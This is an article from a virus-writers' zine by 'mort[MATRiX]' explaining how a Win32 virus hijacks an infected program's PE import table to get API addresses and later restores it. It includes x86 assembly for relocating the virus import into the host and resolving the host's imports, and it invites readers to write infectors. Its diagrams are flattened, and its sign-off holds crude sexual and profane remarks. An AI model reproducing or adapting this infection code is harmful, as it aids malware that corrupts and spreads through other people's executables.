---[ import game by mort[MATRiX]--------------------------------------------- This article is for educational purpose only and author (me,...:) is NOT RESPONSIBILE for any damage based on this text. Anyway, enjoy it... Oh yeee,... and sorry for my english,... ---[ some words before ]----------------------------------------------------- This article is supposed to be more than less theoretical. Anyway u can see stuff described here in Win32.Life virii. Hmmm,... well, theoretical with practical example :). It's up to u. Writing virii is mostly boring stuff ,if u dont write something cool (eg like Stream,... hi Benny, hi Ratter :). I hate things like searching for kernel and searching for APIs, thats like periodical not - changed sex - cool ,but after some years,... i wanted something new and i found it. As i said before it's mostly for theoretical use or im too dummy to use it better,... ---[ the point ]------------------------------------------------------------- It's all about import. When windows loads a file, its import is filled with API's addresses set in import. First in my mind was to add two APIs into import - GetModuleHandleA and GetProcAddress. But this way seems to have more relocation stuff than i was able to accept. Next way i found is the one used in Win32.Life virii. When virii infects file it sets its import to be the host's one. So when infected host is loaded, virii has needed API's addresses in import. When virii finish its job it restores host import and get back to host. Well ,looks simple,... :) ... please, 'import' word is supposed to be an 'import by name', coz this article do not deal with import by ordinals,... never seen it :)... ---[ import ]---------------------------------------------------------------- First some words about import table in PE files. Like other sections, import has its header. .-----------------------. .----- ---------------. | MZ header | | 0h header name | '-----------------------. | 8h virtual size | | PE header | | ch RVA | ... .---------->| 10h phys. size | PE + 080h - import RVA | | 14h phys. offset | ... | ... | | | | 24h flags | '-----------------------. | '----- ---------------' | 1st sec. header | | ... |.-> APIs are imported from DLL that import sec. header --------'| exported APIs (i cant believe i wrote ... | that,.XXX) Each DLL has its record in | | | import table. This record is defined '-----------------------. | by this way: | 1st sec. data | | ... | 0h - RVA to API's name pointers array import sec. data ---------' ch - RVA to module name ... 10h - RVA to API's name pointers array | | (not same like 0h) '-----------------------' Module records ends with NULL record. The same way is finished each array of pointers (0h and 0ch). Let see an example. Imagine file importing two APIs from different modules: MessageBoxA from GDI32.dll and ExitProcess from Kernel32.dll. Import will look like this: 1st module record 2nd module record NULL record GDI32name db 'GDI32.dll',0 - 1st module name KERNLname db 'kernel32.dll',0 - 2nd module name dd RVA_offset MessageBoxA - array from 1st module, RVA_offset 0 dd 0 dd RVA_offset MessageBoxA - array from 1st module, RVA_offset 10 dd 0 dd RVA_offset ExitProcess - array from 2nd module, RVA_offset 0 dd 0 dd RVA_offset ExitProcess - array from 2nd module, RVA_offset 10 dd 0 MessageBoxA db x,x,'MessageBoxA',0 ExitProcess db x,x,'ExitProcess',0 I hope thats enought for import,... if no go and see Iczelion import documentation,... let's go infect,... :) ---[ here we go]------------------------------------------------------------- This part will describe using the stuff described before - infection. Well,... so, find file -> open -> save 512 B of host import (import will allways have an 512 minimum,...) -> copy virii import and relocate it to host image base. suppose esi holds new import,... the virii one eax holds delta import RVA add [esi],eax ;headers,... add [esi + 0ch],eax add [esi + 010h],eax add esi,028h xchg eax,edx mov ecx,_APIcount + 1 ;and table,... push ecx push esi @nextNum: add [esi],edx lodsd loop @nextNum lodsd xchg esi,edi pop esi pop ecx rep movsd and now infection,... before infection and after .---------------. .---------------. | MZ,PE,... | | mZ,pE,... | | ... | '---------------' | normal import | | virii import | <-----. <----. | and | '---------------' | |v | everything | | normal | | a|x | normal | | as well as | | f| | ... | | possible,... | | t|s | :XXXXXX) | '---------------' | e|t | weeeeeeeeeeed | | viriii | | r|u | MiCrOpEnIs | | call APIs ------------' |f | ... | | ------------- | |f copy old import | and so on,.. | | old import | --------------' to its normal '---------------' '---------------' place,... I think this ASCII shit :) describe everything needed. Anyway there's one not mentioned thing. Copy old import to its normal place is not enought to get back to host. We must do the Windows job and find all addresses of old import APIs and store them to right place. See this part of code: suppose edi an offset of old import cld ;get our image base push 0 call [ebp + _GetModuleHandleA - @delta] xchg eax,ebx xchg edi,esi @nextModule: mov eax,[esi + 0ch] ;load library module or eax,eax jz @finished add eax,ebx push eax call [ebp + _LoadLibraryA - @delta] mov [ebp + _moduleHandle - @delta],eax or eax,eax jz @notAvailModule call @getModuleAPIs ;get APIs addresses add esi,014h jmp @nextModule @notAvailModule: call @GDI32 ;no module founded db 'gdi32.dll',0 @GDI32: call [ebp + _LoadLibraryA - @delta] push 0 0 call @mess db '.u have no fucked DLL to run this progie,...',0 @mess: push 0 call @GPA @GPA: db 'MessageBoxA',0 push eax call [ebp + _GetProcAddress - @delta] call eax push 0 call [ebp + _ExitProcess - @delta] @finished: ret ;---[ get APIs of current module ]------------------------------------------- @getModuleAPIs: pusha mov edi,[esi + 010h] ;get buffers info mov esi,[esi] add esi,ebx add edi,ebx @nextFunc: ;get and store APIs addresses lodsd or eax,eax jz @noMoreAPIs add eax,ebx add eax,2 push eax push 012345678h _moduleHandle equ $ - 4 call [ebp + _GetProcAddress - @delta] stosd jmp @nextFunc @noMoreAPIs: popa ret I hope this code is sufficient, anyway as i said u can see whole code in Win32.Life virii. There are many things dealled with import,... anyway, this article is (or was) about to describe some way of infection,... not import,... ---[ some words after ]------------------------------------------------------ Uff,... done,... at last,... go and code,... not this shit, but another one,... yea,... and weed,... huuuuuuuuuuuuuuuuuge tracks of land,... asm forever,... greeeeeeeeeeetings to weeeeeeed (hi benny, hi ratter,...),... greeeeeeeeeeeetings to hash (hi dellyie),... greeeeeeeeeeeeeetings to all giiiiiiiirls with big boooooooobs (hi ULTRAS,...hou, no,... your girl,... hou,... just a joke,... not,.. hou,.. kurva, sem se zamotal,... sorry :) greets to all i know and love/like :XXXXXXXXXXXXXXX) uh,... ty moje prdy strasne smrdiiiiiiii... seru na to, anglictina je na hovno,... du chrapat,... oh ye,... for any coments feel free to contact me,... cya women mort[MATRiX]